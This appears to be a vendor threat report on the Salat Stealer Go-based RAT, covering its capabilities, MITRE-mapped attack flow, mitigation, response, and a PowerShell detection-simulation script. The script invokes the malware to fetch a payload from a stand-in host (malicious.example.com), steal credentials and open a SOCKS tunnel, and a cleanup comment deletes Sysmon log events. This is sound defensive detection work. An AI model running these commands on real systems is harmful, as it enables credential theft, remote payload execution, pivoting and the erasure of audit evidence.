Salat Stealer Analysis Go Based RAT C2 Resilience and Info Stealing Capabilities

SOC Prime Team

Salat Stealer Analysis Go Based RAT C2 Resilience and Info Stealing Capabilities

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

Salat Stealer is a Go-based remote access trojan that functions as a full-featured post-exploitation framework. It supports multiple communication channels, including WebSocket, HTTP/2, HTTP/3, and QUIC, giving operators flexible and resilient command-and-control options. The malware also includes broad credential theft capabilities, targeting browser data, cryptocurrency wallets, keystrokes, screenshots, and network pivoting through SOCKS5. To survive reboots, it uses hidden file copies, scheduled tasks, and a Run registry key. If its primary infrastructure is disrupted, the malware can retrieve updated command-and-control details through the TON blockchain.

Investigation

The analysis explains how the malware derives encryption keys from static strings combined with the victim’s hostname, then uses them to decrypt five embedded command-and-control URLs. Researchers also documented how Salat Stealer selects its transport protocol, processes operator commands, attempts privilege escalation, and deploys multiple persistence methods on the host. The report further outlines the range of stolen data and the broader remote access functions available to the attacker.

Mitigation

Defenders should monitor for connections to the identified command-and-control URLs, as well as unexpected QUIC and WebSocket traffic to unknown destinations. Security teams should also watch for hidden scheduled tasks and suspicious Run key entries that point to unfamiliar executables. Application allow-listing and strict execution controls can help prevent the Go-based payload from running. Network segmentation and TLS inspection can further improve visibility into suspicious outbound traffic associated with the malware.

Response

If Salat Stealer activity is detected, isolate the affected system immediately, collect memory and disk images, and terminate the malicious processes. Remove all persistence artifacts, including scheduled tasks, Run key entries, and hidden file copies used by the malware. The identified command-and-control domains should be blocked, along with any related TON blockchain lookups used for fallback infrastructure discovery. Exposed credentials and cryptocurrency wallets should also be rotated or secured without delay.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccffcc %% Malware definition malware_salatr["Malware – Name: Salat Stealer (Go RAT) Description: Gou2011based remote access trojan used for theft, persistence and lateral movement."] class malware_salatr malware %% Initial execution process process_start["Process – Name: SalatStealer.exe Action: Starts, retrieves own path, checks for existing instance, may bypass UAC. Technique: T1548.002 Bypass User Account Control Technique: T1027.008 Obfuscated/Stored Files"] class process_start process malware_salatr –>|executes| process_start %% Persistence mechanisms persistence_task["Action – T1053.005 Scheduled Task: Creates hidden scheduled task with masqueraded name (explorer.exe)."] class persistence_task action persistence_reg["Action – T1547.001 Registry Run Keys / Startup Folder: HKCU\Run entry using disguised name (svchost.exe)."] class persistence_reg action process_start –>|creates| persistence_task process_start –>|creates| persistence_reg %% Defense evasion defense_evasion["Action – T1027 Obfuscated Files: Sixu2011mode string obfuscation and peru2011machine key derivation."] class defense_evasion action process_start –>|applies| defense_evasion %% System discovery discovery["Action – T1082 System Information Discovery: Gathers OS, CPU, GPU, RAM, active window title, admin status and builds an agent identifier."] class discovery action process_start –>|performs| discovery %% Credential access credential_access["Action – T1555.003 Credentials from Web Browsers: Dumps Chromium, Firefox, Discord, Steam browsers and DPAPIu2011encrypted passwords. Additional techniques: T1056.001 Keylogging, T1115 Clipboard Data."] class credential_access action process_start –>|performs| credential_access %% Collection of data collection["Action – T1113 Screenshot, T1125 Video Capture, T1560.001 Archive via Utility: Captures screen, webcam video and archives data into ZIP files."] class collection action credential_access –>|collects| collection %% Command and control c2["Action – T1071.005 WebSocket and T1071.001 Web Protocol: Communicates over QUIC/WebSocket with encrypted URLs; falls back to alternate endpoints and TON blockchain. Technique: T1008 Fallback Channels"] class c2 action collection –>|exfiltrates via| c2 %% Exfiltration exfiltration["Action – T1041 Exfiltration Over C2 Channel, T1048 Exfiltration Over Alternative Protocol, T1020 Automated Exfiltration: Sends archived data and stolen credentials."] class exfiltration action c2 –>|sends data| exfiltration %% Execution of remote commands command_exec["Action – T1059.003 Windows Command Shell: Receives and runs commandu2011line instructions from the attacker. Technique: T1090.001 SOCKS5 Proxy for tunneling."] class command_exec action exfiltration –>|receives commands| command_exec %% Lateral movement via proxy lateral["Action – T1090.001 Proxy (SOCKS5): Establishes internal SOCKS5 tunnel for pivoting and lateral movement."] class lateral action command_exec –>|establishes| lateral "

Attack Flow

Attack Narrative & Commands:
An adversary has delivered the Salat RAT binary (salat.exe) to the victim host via a phishing attachment. After gaining a low‑privilege foothold, the attacker executes the binary with specific arguments to:
1. Download a secondary payload – main.downloadFile https://malicious.example.com/payload.exe.
2. Steal stored credentials – main.Steal -module credentials.
3. Establish a peer‑to‑peer SOCKS tunnel for lateral movement – main.p2pSocks -listen 1080 -remote 10.0.0.5:4444.
The binary is launched from an elevated PowerShell session to satisfy the elevation requirement (T1548). Each invocation appears as a distinct Sysmon process creation with the corresponding command line, satisfying the Sigma rule’s string match.

Regression Test Script:

# -------------------------------------------------
# Salat RAT simulation script – triggers detection
# -------------------------------------------------
$binaryPath = "C:Tempsalat.exe"

# Ensure the binary exists (placeholder – in a real test the binary would be pre‑staged)
if (-Not (Test-Path $binaryPath)) {
    Write-Error "Salat binary not found at $binaryPath"
    exit 1
}

# 1. Download secondary payload
Start-Process -FilePath $binaryPath -ArgumentList "main.downloadFile https://malicious.example.com/payload.exe" -Wait

# 2. Steal credentials
Start-Process -FilePath $binaryPath -ArgumentList "main.Steal -module credentials" -Wait

# 3. Open P2P SOCKS tunnel
Start-Process -FilePath $binaryPath -ArgumentList "main.p2pSocks -listen 1080 -remote 10.0.0.5:4444" -Wait

Write-Host "Simulation completed."

Cleanup Commands:

# -------------------------------------------------
# Cleanup for Salat RAT simulation
# -------------------------------------------------
# Terminate any lingering Salat processes
Get-Process -Name "salat" -ErrorAction SilentlyContinue | Stop-Process -Force

# Remove the binary (if allowed)
$binaryPath = "C:Tempsalat.exe"
if (Test-Path $binaryPath) {
    Remove-Item $binaryPath -Force
    Write-Host "Removed $binaryPath"
}

# Optionally clear related Sysmon events from the test index (Splunk example)
# splunk cmd search '| delete index=main host="test-host" sourcetype="Sysmon" earliest=-24h latest=now'

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free